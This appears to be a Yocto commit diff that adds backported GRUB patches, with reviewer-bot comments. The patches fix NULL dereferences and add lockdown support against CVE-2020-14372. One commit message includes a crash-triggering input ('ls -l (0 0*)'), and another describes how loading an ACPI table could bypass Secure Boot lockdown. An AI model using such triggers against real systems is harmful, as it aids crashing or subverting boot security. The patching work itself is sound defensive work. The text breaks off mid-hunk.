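Review bot: The second conversion reads `size64 = (grub_uint64_t) size;`, but `size64` is declared `grub_uint32_t` a few lines above, so the value is widened and then implicitly narrowed on assignment; it should mirror the 32-bit case, `size64 = (grub_uint32_t) size;`. The new checks reject only a negative ftell() result: where `long` is wider than 32 bits, a file length above the 32-bit maximum still passes and is silently truncated into `size32` or `size64`, so an upper-bound test next to each `size < 0` check would close that gap. The fseek() calls around them stay unchecked, as before the patch. write_fat continues past the end of the hunk.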
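--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0044-script-execute-Fix-NULL-dereference-in-grub_script_e.patch
@@ -0,0 +1,28 @@
+From f5fb56954e5926ced42a980c3e0842ffd5fea2aa Mon Sep 17 00:00:00 2001
+From: Daniel Axtens <dja@axtens.net>
+Date: Fri, 3 Apr 2020 23:05:13 +1100
+Subject: [PATCH] script/execute: Fix NULL dereference in
+ grub_script_execute_cmdline()
+
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=41ae93b2e6c75453514629bcfe684300e3aec0ce]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/script/execute.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/script/execute.c b/grub-core/script/execute.c
+index 7e028e1..5ea2aef 100644
+--- a/grub-core/script/execute.c
++++ b/grub-core/script/execute.c
+@@ -940,7 +940,7 @@ grub_script_execute_cmdline (struct grub_script_cmd *cmd)
+ struct grub_script_argv argv = { 0, 0, 0 };
+
+ /* Lookup the command. */
+- if (grub_script_arglist_to_argv (cmdline->arglist, &argv) || ! argv.args[0])
++ if (grub_script_arglist_to_argv (cmdline->arglist, &argv) || ! argv.args || ! argv.args[0])
+ return grub_errno;
+
+ for (i = 0; i < argv.argc; i++)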
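--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0045-commands-ls-Require-device_name-is-not-NULL-before-p.patch
@@ -0,0 +1,33 @@
+From dd82f98fa642907817f59aeaf3761b786898df85 Mon Sep 17 00:00:00 2001
+From: Daniel Axtens <dja@axtens.net>
+Date: Mon, 11 Jan 2021 16:57:37 +1100
+Subject: [PATCH] commands/ls: Require device_name is not NULL before printing
+
+This can be triggered with:
+ ls -l (0 0*)
+and causes a NULL deref in grub_normal_print_device_info().
+
+I'm not sure if there's any implication with the IEEE 1275 platform.
+
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=6afbe6063c95b827372f9ec310c9fc7461311eb1]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/commands/ls.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/commands/ls.c b/grub-core/commands/ls.c
+index 5b7491a..326d2d6 100644
+--- a/grub-core/commands/ls.c
++++ b/grub-core/commands/ls.c
+@@ -196,7 +196,7 @@ grub_ls_list_files (char *dirname, int longlist, int all, int human)
+ goto fail;
+ }
+
+- if (! *path)
++ if (! *path && device_name)
+ {
+ if (grub_errno == GRUB_ERR_UNKNOWN_FS)
+ grub_errno = GRUB_ERR_NONE;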
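Review bot: With the added `&& device_name`, the case of an empty path and a NULL device no longer enters this block, so it now runs whatever follows the `if`; that code is outside the hunk, and the commit message itself leaves the IEEE 1275 implication open. It is worth confirming that the following branch copes with an empty `path` and a NULL `device_name`, rather than just moving the dereference further down. A short comment on the condition would help the next reader, e.g. `/* device_name may be NULL (e.g. "ls -l (0 0*)"); skip the device-info print then. */`. grub_ls_list_files starts and ends outside the hunk.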
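--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0046-script-execute-Avoid-crash-when-using-outside-a-func.patch
@@ -0,0 +1,37 @@
+From df2505c4c3cf42b0c419c99a5f9e1ce63e5a5938 Mon Sep 17 00:00:00 2001
+From: Daniel Axtens <dja@axtens.net>
+Date: Mon, 11 Jan 2021 17:30:42 +1100
+Subject: [PATCH] script/execute: Avoid crash when using "$#" outside a
+ function scope
+
+"$#" represents the number of arguments to a function. It is only
+defined in a function scope, where "scope" is non-NULL. Currently,
+if we attempt to evaluate "$#" outside a function scope, "scope" will
+be NULL and we will crash with a NULL pointer dereference.
+
+Do not attempt to count arguments for "$#" if "scope" is NULL. This
+will result in "$#" being interpreted as an empty string if evaluated
+outside a function scope.
+
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=fe0586347ee46f927ae27bb9673532da9f5dead5]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/script/execute.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/script/execute.c b/grub-core/script/execute.c
+index 5ea2aef..23d34bd 100644
+--- a/grub-core/script/execute.c
++++ b/grub-core/script/execute.c
+@@ -485,7 +485,7 @@ gettext_putvar (const char *str, grub_size_t len,
+ return 0;
+
+ /* Enough for any number. */
+- if (len == 1 && str[0] == '#')
++ if (len == 1 && str[0] == '#' && scope != NULL)
+ {
+ grub_snprintf (*ptr, 30, "%u", scope->argv.argc);
+ *ptr += grub_strlen (*ptr);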
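--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372.patch
@@ -0,0 +1,76 @@
+From 0d237c0b90f0c6d4a3662c569b2371ae3ed69574 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Mon, 28 Sep 2020 20:08:41 +0200
+Subject: [PATCH] acpi: Don't register the acpi command when locked down
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The command is not allowed when lockdown is enforced. Otherwise an
+attacker can instruct the GRUB to load an SSDT table to overwrite
+the kernel lockdown configuration and later load and execute
+unsigned code.
+
+Fixes: CVE-2020-14372
+
+Reported-by: Máté Kukri <km@mkukri.xyz>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=3e8e4c0549240fa209acffceb473e1e509b50c95]
+CVE: CVE-2020-14372
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ docs/grub.texi | 5 +++++
+ grub-core/commands/acpi.c | 15 ++++++++-------
+ 2 files changed, 13 insertions(+), 7 deletions(-)
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index 0786427..47ac7ff 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -3986,6 +3986,11 @@ Normally, this command will replace the Root System Description Pointer
+ (RSDP) in the Extended BIOS Data Area to point to the new tables. If the
+ @option{--no-ebda} option is used, the new tables will be known only to
+ GRUB, but may be used by GRUB's EFI emulation.
++
++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
++ Otherwise an attacker can instruct the GRUB to load an SSDT table to
++ overwrite the kernel lockdown configuration and later load and execute
++ unsigned code.
+ @end deffn
+
+
+diff --git a/grub-core/commands/acpi.c b/grub-core/commands/acpi.c
+index 5a1499a..1215f2a 100644
+--- a/grub-core/commands/acpi.c
++++ b/grub-core/commands/acpi.c
+@@ -27,6 +27,7 @@
+ #include <grub/mm.h>
+ #include <grub/memory.h>
+ #include <grub/i18n.h>
++#include <grub/lockdown.h>
+
+ #ifdef GRUB_MACHINE_EFI
+ #include <grub/efi/efi.h>
+@@ -775,13 +776,13 @@ static grub_extcmd_t cmd;
+
+ GRUB_MOD_INIT(acpi)
+ {
+- cmd = grub_register_extcmd ("acpi", grub_cmd_acpi, 0,
+- N_("[-1|-2] [--exclude=TABLE1,TABLE2|"
+- "--load-only=TABLE1,TABLE2] FILE1"
+- " [FILE2] [...]"),
+- N_("Load host ACPI tables and tables "
+- "specified by arguments."),
+- options);
++ cmd = grub_register_extcmd_lockdown ("acpi", grub_cmd_acpi, 0,
++ N_("[-1|-2] [--exclude=TABLE1,TABLE2|"
++ "--load-only=TABLE1,TABLE2] FILE1"
++ " [FILE2] [...]"),
++ N_("Load host ACPI tables and tables "
++ "specified by arguments."),
++ options);
+ }
+
+ GRUB_MOD_FINI(acpi)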
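Review bot: The lockdown decision for `acpi` is taken once, inside GRUB_MOD_INIT(acpi): grub_register_extcmd_lockdown(), as added by CVE-2020-14372_2.patch in this same commit, swaps in the refusing handler only if grub_is_lockdown() already reports GRUB_LOCKDOWN_ENABLED at registration time. The protection therefore depends on grub_lockdown() having run before this module is initialised, which nothing in this hunk shows; a comment in the init function would make that ordering requirement explicit, e.g. `/* Lockdown is sampled at registration: grub_lockdown () must have been called before this module loads. */`. This patch also includes `<grub/lockdown.h>`, a header created by CVE-2020-14372_2.patch, so the recipe has to apply the _1 and _2 patches before this one; the file names alone do not sort in that order.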
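--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372_1.patch
@@ -0,0 +1,130 @@
+From fe7a13df6200bda934fcc0246458df249f1ef4f2 Mon Sep 17 00:00:00 2001
+From: Marco A Benatto <mbenatto@redhat.com>
+Date: Wed, 23 Sep 2020 11:33:33 -0400
+Subject: [PATCH] verifiers: Move verifiers API to kernel image
+
+Move verifiers API from a module to the kernel image, so it can be
+used there as well. There are no functional changes in this patch.
+
+Signed-off-by: Marco A Benatto <mbenatto@redhat.com>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=9e95f45ceeef36fcf93cbfffcf004276883dbc99]
+CVE: CVE-2020-14372
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/Makefile.am | 1 +
+ grub-core/Makefile.core.def | 6 +-----
+ grub-core/kern/main.c | 4 ++++
+ grub-core/{commands => kern}/verifiers.c | 8 ++------
+ include/grub/verify.h | 9 ++++++---
+ 5 files changed, 14 insertions(+), 14 deletions(-)
+ rename grub-core/{commands => kern}/verifiers.c (97%)
+
+diff --git a/grub-core/Makefile.am b/grub-core/Makefile.am
+index 3ea8e7f..375c30d 100644
+--- a/grub-core/Makefile.am
++++ b/grub-core/Makefile.am
+@@ -90,6 +90,7 @@ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/parser.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/partition.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/term.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/time.h
++KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/verify.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/mm_private.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/net.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/memory.h
+diff --git a/grub-core/Makefile.core.def b/grub-core/Makefile.core.def
+index 474a63e..cff02f2 100644
+--- a/grub-core/Makefile.core.def
++++ b/grub-core/Makefile.core.def
+@@ -140,6 +140,7 @@ kernel = {
+ common = kern/rescue_parser.c;
+ common = kern/rescue_reader.c;
+ common = kern/term.c;
++ common = kern/verifiers.c;
+
+ noemu = kern/compiler-rt.c;
+ noemu = kern/mm.c;
+@@ -942,11 +943,6 @@ module = {
+ cppflags = '-I$(srcdir)/lib/posix_wrap';
+ };
+
+-module = {
+- name = verifiers;
+- common = commands/verifiers.c;
+-};
+-
+ module = {
+ name = shim_lock;
+ common = commands/efi/shim_lock.c;
+diff --git a/grub-core/kern/main.c b/grub-core/kern/main.c
+index 9cad0c4..73967e2 100644
+--- a/grub-core/kern/main.c
++++ b/grub-core/kern/main.c
+@@ -29,6 +29,7 @@
+ #include <grub/command.h>
+ #include <grub/reader.h>
+ #include <grub/parser.h>
++#include <grub/verify.h>
+
+ #ifdef GRUB_MACHINE_PCBIOS
+ #include <grub/machine/memory.h>
+@@ -274,6 +275,9 @@ grub_main (void)
+ grub_printf ("Welcome to GRUB!\n\n");
+ grub_setcolorstate (GRUB_TERM_COLOR_STANDARD);
+
++ /* Init verifiers API. */
++ grub_verifiers_init ();
++
+ grub_load_config ();
+
+ grub_boot_time ("Before loading embedded modules.");
+diff --git a/grub-core/commands/verifiers.c b/grub-core/kern/verifiers.c
+similarity index 97%
+rename from grub-core/commands/verifiers.c
+rename to grub-core/kern/verifiers.c
+index 0dde481..aa3dc7c 100644
+--- a/grub-core/commands/verifiers.c
++++ b/grub-core/kern/verifiers.c
+@@ -217,12 +217,8 @@ grub_verify_string (char *str, enum grub_verify_string_type type)
+ return GRUB_ERR_NONE;
+ }
+
+-GRUB_MOD_INIT(verifiers)
++void
++grub_verifiers_init (void)
+ {
+ grub_file_filter_register (GRUB_FILE_FILTER_VERIFY, grub_verifiers_open);
+ }
+-
+-GRUB_MOD_FINI(verifiers)
+-{
+- grub_file_filter_unregister (GRUB_FILE_FILTER_VERIFY);
+-}
+diff --git a/include/grub/verify.h b/include/grub/verify.h
+index ea04914..cd129c3 100644
+--- a/include/grub/verify.h
++++ b/include/grub/verify.h
+@@ -64,7 +64,10 @@ struct grub_file_verifier
+ grub_err_t (*verify_string) (char *str, enum grub_verify_string_type type);
+ };
+
+-extern struct grub_file_verifier *grub_file_verifiers;
++extern struct grub_file_verifier *EXPORT_VAR (grub_file_verifiers);
++
++extern void
++grub_verifiers_init (void);
+
+ static inline void
+ grub_verifier_register (struct grub_file_verifier *ver)
+@@ -78,7 +81,7 @@ grub_verifier_unregister (struct grub_file_verifier *ver)
+ grub_list_remove (GRUB_AS_LIST (ver));
+ }
+
+-grub_err_t
+-grub_verify_string (char *str, enum grub_verify_string_type type);
++extern grub_err_t
++EXPORT_FUNC (grub_verify_string) (char *str, enum grub_verify_string_type type);
+
+ #endif /* ! GRUB_VERIFY_HEADER */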
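Review bot: The `verifiers` module entry is deleted from Makefile.core.def, so after this patch there is no separate verifiers module to build or load; any image module list or `insmod verifiers` in a configuration outside this commit would need checking (none is visible here). In the verifiers.c hunk GRUB_MOD_FINI is dropped together with the grub_file_filter_unregister() call, so once grub_verifiers_init() has run from grub_main the verify filter stays registered for the whole session; that is reasonable for kernel code, but it is a behaviour change the "no functional changes" description does not mention. The new prototype in include/grub/verify.h carries no comment; something like `/* Register the verify file filter; called once from grub_main () before grub_load_config (). */` would document the intended call site.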
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14372_2.patch b/meta/recipes-bsp/grub/files/CVE-2020-14372_2.patch
new file mode 100644
index 0000000000..a98b5d0455
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372_2.patch
@@ -0,0 +1,431 @@
1From d8aac4517fef0f0188a60a2a8ff9cafdd9c7ca42 Mon Sep 17 00:00:00 2001
2From: Javier Martinez Canillas <javierm@redhat.com>
3Date: Mon, 28 Sep 2020 20:08:02 +0200
4Subject: [PATCH] kern: Add lockdown support
5
6When the GRUB starts on a secure boot platform, some commands can be
7used to subvert the protections provided by the verification mechanism and
8could lead to booting untrusted system.
9
10To prevent that situation, allow GRUB to be locked down. That way the code
11may check if GRUB has been locked down and further restrict the commands
12that are registered or what subset of their functionality could be used.
13
14The lockdown support adds the following components:
15
16* The grub_lockdown() function which can be used to lockdown GRUB if,
17 e.g., UEFI Secure Boot is enabled.
18
19* The grub_is_lockdown() function which can be used to check if the GRUB
20 was locked down.
21
22* A verifier that flags OS kernels, the GRUB modules, Device Trees and ACPI
23 tables as GRUB_VERIFY_FLAGS_DEFER_AUTH to defer verification to other
24 verifiers. These files are only successfully verified if another registered
25 verifier returns success. Otherwise, the whole verification process fails.
26
27 For example, PE/COFF binaries verification can be done by the shim_lock
28 verifier which validates the signatures using the shim_lock protocol.
29 However, the verification is not deferred directly to the shim_lock verifier.
30 The shim_lock verifier is hooked into the verification process instead.
31
32* A set of grub_{command,extcmd}_lockdown functions that can be used by
33 code registering command handlers, to only register unsafe commands if
34 the GRUB has not been locked down.
35
36Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
37Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
38
39Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=578c95298bcc46e0296f4c786db64c2ff26ce2cc]
40CVE: CVE-2020-14372
41Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
42---
43 conf/Makefile.common | 2 +
44 docs/grub-dev.texi | 27 +++++++++++++
45 docs/grub.texi | 8 ++++
46 grub-core/Makefile.am | 5 ++-
47 grub-core/Makefile.core.def | 1 +
48 grub-core/commands/extcmd.c | 23 +++++++++++
49 grub-core/kern/command.c | 24 +++++++++++
50 grub-core/kern/lockdown.c | 80 +++++++++++++++++++++++++++++++++++++
51 include/grub/command.h | 5 +++
52 include/grub/extcmd.h | 7 ++++
53 include/grub/lockdown.h | 44 ++++++++++++++++++++
54 11 files changed, 225 insertions(+), 1 deletion(-)
55 create mode 100644 grub-core/kern/lockdown.c
56 create mode 100644 include/grub/lockdown.h
57
58diff --git a/conf/Makefile.common b/conf/Makefile.common
59index 6cd71cb..2a1a886 100644
60--- a/conf/Makefile.common
61+++ b/conf/Makefile.common
62@@ -84,7 +84,9 @@ CPPFLAGS_PARTTOOL_LIST = -Dgrub_parttool_register=PARTTOOL_LIST_MARKER
63 CPPFLAGS_TERMINAL_LIST = '-Dgrub_term_register_input(...)=INPUT_TERMINAL_LIST_MARKER(__VA_ARGS__)'
64 CPPFLAGS_TERMINAL_LIST += '-Dgrub_term_register_output(...)=OUTPUT_TERMINAL_LIST_MARKER(__VA_ARGS__)'
65 CPPFLAGS_COMMAND_LIST = '-Dgrub_register_command(...)=COMMAND_LIST_MARKER(__VA_ARGS__)'
66+CPPFLAGS_COMMAND_LIST += '-Dgrub_register_command_lockdown(...)=COMMAND_LOCKDOWN_LIST_MARKER(__VA_ARGS__)'
67 CPPFLAGS_COMMAND_LIST += '-Dgrub_register_extcmd(...)=EXTCOMMAND_LIST_MARKER(__VA_ARGS__)'
68+CPPFLAGS_COMMAND_LIST += '-Dgrub_register_extcmd_lockdown(...)=EXTCOMMAND_LOCKDOWN_LIST_MARKER(__VA_ARGS__)'
69 CPPFLAGS_COMMAND_LIST += '-Dgrub_register_command_p1(...)=P1COMMAND_LIST_MARKER(__VA_ARGS__)'
70 CPPFLAGS_FDT_LIST := '-Dgrub_fdtbus_register(...)=FDT_DRIVER_LIST_MARKER(__VA_ARGS__)'
71 CPPFLAGS_MARKER = $(CPPFLAGS_FS_LIST) $(CPPFLAGS_VIDEO_LIST) \
72diff --git a/docs/grub-dev.texi b/docs/grub-dev.texi
73index ee389fd..635ec72 100644
74--- a/docs/grub-dev.texi
75+++ b/docs/grub-dev.texi
76@@ -86,6 +86,7 @@ This edition documents version @value{VERSION}.
77 * PFF2 Font File Format::
78 * Graphical Menu Software Design::
79 * Verifiers framework::
80+* Lockdown framework::
81 * Copying This Manual:: Copying This Manual
82 * Index::
83 @end menu
84@@ -2086,6 +2087,32 @@ Optionally at the end of the file @samp{fini}, if it exists, is called with just
85 the context. If you return no error during any of @samp{init}, @samp{write} and
86 @samp{fini} then the file is considered as having succeded verification.
87
88+@node Lockdown framework
89+@chapter Lockdown framework
90+
91+The GRUB can be locked down, which is a restricted mode where some operations
92+are not allowed. For instance, some commands cannot be used when the GRUB is
93+locked down.
94+
95+The function
96+@code{grub_lockdown()} is used to lockdown GRUB and the function
97+@code{grub_is_lockdown()} function can be used to check whether lockdown is
98+enabled or not. When enabled, the function returns @samp{GRUB_LOCKDOWN_ENABLED}
99+and @samp{GRUB_LOCKDOWN_DISABLED} when is not enabled.
100+
101+The following functions can be used to register the commands that can only be
102+used when lockdown is disabled:
103+
104+@itemize
105+
106+@item @code{grub_cmd_lockdown()} registers command which should not run when the
107+GRUB is in lockdown mode.
108+
109+@item @code{grub_cmd_lockdown()} registers extended command which should not run
110+when the GRUB is in lockdown mode.
111+
112+@end itemize
113+
114 @node Copying This Manual
115 @appendix Copying This Manual
116
117diff --git a/docs/grub.texi b/docs/grub.texi
118index 8779507..d778bfb 100644
119--- a/docs/grub.texi
120+++ b/docs/grub.texi
121@@ -5581,6 +5581,7 @@ environment variables and commands are listed in the same order.
122 * Using digital signatures:: Booting digitally signed code
123 * UEFI secure boot and shim:: Booting digitally signed PE files
124 * Measured Boot:: Measuring boot components
125+* Lockdown:: Lockdown when booting on a secure setup
126 @end menu
127
128 @node Authentication and authorisation
129@@ -5794,6 +5795,13 @@ into @file{core.img} in order to avoid a potential gap in measurement between
130
131 Measured boot is currently only supported on EFI platforms.
132
133+@node Lockdown
134+@section Lockdown when booting on a secure setup
135+
136+The GRUB can be locked down when booted on a secure boot environment, for example
137+if the UEFI secure boot is enabled. On a locked down configuration, the GRUB will
138+be restricted and some operations/commands cannot be executed.
139+
140 @node Platform limitations
141 @chapter Platform limitations
142
143diff --git a/grub-core/Makefile.am b/grub-core/Makefile.am
144index 375c30d..3096241 100644
145--- a/grub-core/Makefile.am
146+++ b/grub-core/Makefile.am
147@@ -79,6 +79,7 @@ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/fs.h
148 KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/i18n.h
149 KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/kernel.h
150 KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/list.h
151+KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/lockdown.h
152 KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/misc.h
153 if COND_emu
154 KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/compiler-rt-emu.h
155@@ -376,8 +377,10 @@ command.lst: $(MARKER_FILES)
156 b=`basename $$pp .marker`; \
157 sed -n \
158 -e "/EXTCOMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/*\1: $$b/;p;}" \
159+ -e "/EXTCOMMAND_LOCKDOWN_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/*\1: $$b/;p;}" \
160 -e "/P1COMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/*\1: $$b/;p;}" \
161- -e "/COMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/\1: $$b/;p;}" $$pp; \
162+ -e "/COMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/\1: $$b/;p;}" \
163+ -e "/COMMAND_LOCKDOWN_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/\1: $$b/;p;}" $$pp; \
164 done) | sort -u > $@
165 platform_DATA += command.lst
166 CLEANFILES += command.lst
167diff --git a/grub-core/Makefile.core.def b/grub-core/Makefile.core.def
168index cff02f2..651ea2a 100644
169--- a/grub-core/Makefile.core.def
170+++ b/grub-core/Makefile.core.def
171@@ -204,6 +204,7 @@ kernel = {
172 efi = term/efi/console.c;
173 efi = kern/acpi.c;
174 efi = kern/efi/acpi.c;
175+ efi = kern/lockdown.c;
176 i386_coreboot = kern/i386/pc/acpi.c;
177 i386_multiboot = kern/i386/pc/acpi.c;
178 i386_coreboot = kern/acpi.c;
179diff --git a/grub-core/commands/extcmd.c b/grub-core/commands/extcmd.c
180index 69574e2..90a5ca2 100644
181--- a/grub-core/commands/extcmd.c
182+++ b/grub-core/commands/extcmd.c
183@@ -19,6 +19,7 @@
184
185 #include <grub/mm.h>
186 #include <grub/list.h>
187+#include <grub/lockdown.h>
188 #include <grub/misc.h>
189 #include <grub/extcmd.h>
190 #include <grub/script_sh.h>
191@@ -110,6 +111,28 @@ grub_register_extcmd (const char *name, grub_extcmd_func_t func,
192 summary, description, parser, 1);
193 }
194
195+static grub_err_t
196+grub_extcmd_lockdown (grub_extcmd_context_t ctxt __attribute__ ((unused)),
197+ int argc __attribute__ ((unused)),
198+ char **argv __attribute__ ((unused)))
199+{
200+ return grub_error (GRUB_ERR_ACCESS_DENIED,
201+ N_("%s: the command is not allowed when lockdown is enforced"),
202+ ctxt->extcmd->cmd->name);
203+}
204+
205+grub_extcmd_t
206+grub_register_extcmd_lockdown (const char *name, grub_extcmd_func_t func,
207+ grub_command_flags_t flags, const char *summary,
208+ const char *description,
209+ const struct grub_arg_option *parser)
210+{
211+ if (grub_is_lockdown () == GRUB_LOCKDOWN_ENABLED)
212+ func = grub_extcmd_lockdown;
213+
214+ return grub_register_extcmd (name, func, flags, summary, description, parser);
215+}
216+
217 void
218 grub_unregister_extcmd (grub_extcmd_t ext)
219 {
220diff --git a/grub-core/kern/command.c b/grub-core/kern/command.c
221index acd7218..4aabcd4 100644
222--- a/grub-core/kern/command.c
223+++ b/grub-core/kern/command.c
224@@ -17,6 +17,7 @@
225 * along with GRUB. If not, see <http://www.gnu.org/licenses/>.
226 */
227
228+#include <grub/lockdown.h>
229 #include <grub/mm.h>
230 #include <grub/command.h>
231
232@@ -77,6 +78,29 @@ grub_register_command_prio (const char *name,
233 return cmd;
234 }
235
236+static grub_err_t
237+grub_cmd_lockdown (grub_command_t cmd __attribute__ ((unused)),
238+ int argc __attribute__ ((unused)),
239+ char **argv __attribute__ ((unused)))
240+
241+{
242+ return grub_error (GRUB_ERR_ACCESS_DENIED,
243+ N_("%s: the command is not allowed when lockdown is enforced"),
244+ cmd->name);
245+}
246+
247+grub_command_t
248+grub_register_command_lockdown (const char *name,
249+ grub_command_func_t func,
250+ const char *summary,
251+ const char *description)
252+{
253+ if (grub_is_lockdown () == GRUB_LOCKDOWN_ENABLED)
254+ func = grub_cmd_lockdown;
255+
256+ return grub_register_command_prio (name, func, summary, description, 0);
257+}
258+
259 void
260 grub_unregister_command (grub_command_t cmd)
261 {
262diff --git a/grub-core/kern/lockdown.c b/grub-core/kern/lockdown.c
263new file mode 100644
264index 0000000..1e56c0b
265--- /dev/null
266+++ b/grub-core/kern/lockdown.c
267@@ -0,0 +1,80 @@
268+/*
269+ * GRUB -- GRand Unified Bootloader
270+ * Copyright (C) 2020 Free Software Foundation, Inc.
271+ *
272+ * GRUB is free software: you can redistribute it and/or modify
273+ * it under the terms of the GNU General Public License as published by
274+ * the Free Software Foundation, either version 3 of the License, or
275+ * (at your option) any later version.
276+ *
277+ * GRUB is distributed in the hope that it will be useful,
278+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
279+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
280+ * GNU General Public License for more details.
281+ *
282+ * You should have received a copy of the GNU General Public License
283+ * along with GRUB. If not, see <http://www.gnu.org/licenses/>.
284+ *
285+ */
286+
287+#include <grub/dl.h>
288+#include <grub/file.h>
289+#include <grub/lockdown.h>
290+#include <grub/verify.h>
291+
292+static int lockdown = GRUB_LOCKDOWN_DISABLED;
293+
294+static grub_err_t
295+lockdown_verifier_init (grub_file_t io __attribute__ ((unused)),
296+ enum grub_file_type type,
297+ void **context __attribute__ ((unused)),
298+ enum grub_verify_flags *flags)
299+{
300+ *flags = GRUB_VERIFY_FLAGS_SKIP_VERIFICATION;
301+
302+ switch (type & GRUB_FILE_TYPE_MASK)
303+ {
304+ case GRUB_FILE_TYPE_GRUB_MODULE:
305+ case GRUB_FILE_TYPE_LINUX_KERNEL:
306+ case GRUB_FILE_TYPE_MULTIBOOT_KERNEL:
307+ case GRUB_FILE_TYPE_XEN_HYPERVISOR:
308+ case GRUB_FILE_TYPE_BSD_KERNEL:
309+ case GRUB_FILE_TYPE_XNU_KERNEL:
310+ case GRUB_FILE_TYPE_PLAN9_KERNEL:
311+ case GRUB_FILE_TYPE_NTLDR:
312+ case GRUB_FILE_TYPE_TRUECRYPT:
313+ case GRUB_FILE_TYPE_FREEDOS:
314+ case GRUB_FILE_TYPE_PXECHAINLOADER:
315+ case GRUB_FILE_TYPE_PCCHAINLOADER:
316+ case GRUB_FILE_TYPE_COREBOOT_CHAINLOADER:
317+ case GRUB_FILE_TYPE_EFI_CHAINLOADED_IMAGE:
318+ case GRUB_FILE_TYPE_ACPI_TABLE:
319+ case GRUB_FILE_TYPE_DEVICE_TREE_IMAGE:
320+ *flags = GRUB_VERIFY_FLAGS_DEFER_AUTH;
321+
322+ /* Fall through. */
323+
324+ default:
325+ return GRUB_ERR_NONE;
326+ }
327+}
328+
329+struct grub_file_verifier lockdown_verifier =
330+ {
331+ .name = "lockdown_verifier",
332+ .init = lockdown_verifier_init,
333+ };
334+
335+void
336+grub_lockdown (void)
337+{
338+ lockdown = GRUB_LOCKDOWN_ENABLED;
339+
340+ grub_verifier_register (&lockdown_verifier);
341+}
342+
343+int
344+grub_is_lockdown (void)
345+{
346+ return lockdown;
347+}
348diff --git a/include/grub/command.h b/include/grub/command.h
349index eee4e84..2a6f7f8 100644
350--- a/include/grub/command.h
351+++ b/include/grub/command.h
352@@ -86,6 +86,11 @@ EXPORT_FUNC(grub_register_command_prio) (const char *name,
353 const char *summary,
354 const char *description,
355 int prio);
356+grub_command_t
357+EXPORT_FUNC(grub_register_command_lockdown) (const char *name,
358+ grub_command_func_t func,
359+ const char *summary,
360+ const char *description);
361 void EXPORT_FUNC(grub_unregister_command) (grub_command_t cmd);
362
363 static inline grub_command_t
364diff --git a/include/grub/extcmd.h b/include/grub/extcmd.h
365index 19fe592..fe9248b 100644
366--- a/include/grub/extcmd.h
367+++ b/include/grub/extcmd.h
368@@ -62,6 +62,13 @@ grub_extcmd_t EXPORT_FUNC(grub_register_extcmd) (const char *name,
369 const char *description,
370 const struct grub_arg_option *parser);
371
